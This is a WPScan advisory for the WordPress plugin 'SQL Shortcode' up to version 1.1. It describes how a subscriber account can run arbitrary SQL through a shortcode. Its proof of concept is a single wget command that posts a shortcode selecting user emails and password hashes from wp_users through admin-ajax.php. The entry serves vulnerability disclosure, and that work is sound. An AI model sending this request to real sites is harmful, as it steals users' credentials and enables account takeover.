SQL Shortcode <= 1.1 - Authenticated SQL Execution



Description
It's not an SQL injection actually, it's just executing SQL with an account as low-privileged as a subscriber. The plugin description says it all.

This (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) great article will help understanding how to exploit shortcodes and why this works.

Vulnerabilities:

Execute whatever SQL you want to execute.

Found by:

Paul Dannewitz

Other vulnerabilities I submitted to wpvulndb: https://wpvulndb.com/search?utf8=%E2%9C%93&text=Paul+Dannewitz
Proof of Concept
wget --load-cookies cookie_file_with_cookies_of_just_a_subscriber_account.txt --post-data="action=parse-media-shortcode&shortcode=[sql]SELECT user_email, user_pass FROM wp_users[/sql]" wordpress.app/wp-admin/admin-ajax.php

Make sure the cookie file has the right format (Netscape), useful converter: http://crdx.org/misc/cookies/

Affects Plugin

References

URL https://wordpress.org/plugins/sql-shortcode/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Paul Dannewitz
Submitter Twitter padannewitz
Views 138
Verified No
WPVDB ID 8904

Timeline

Publicly Published 2017-09-02 (about 1 year ago)
Added 2017-09-20 (about 1 year ago)
Last Updated 2017-09-20 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.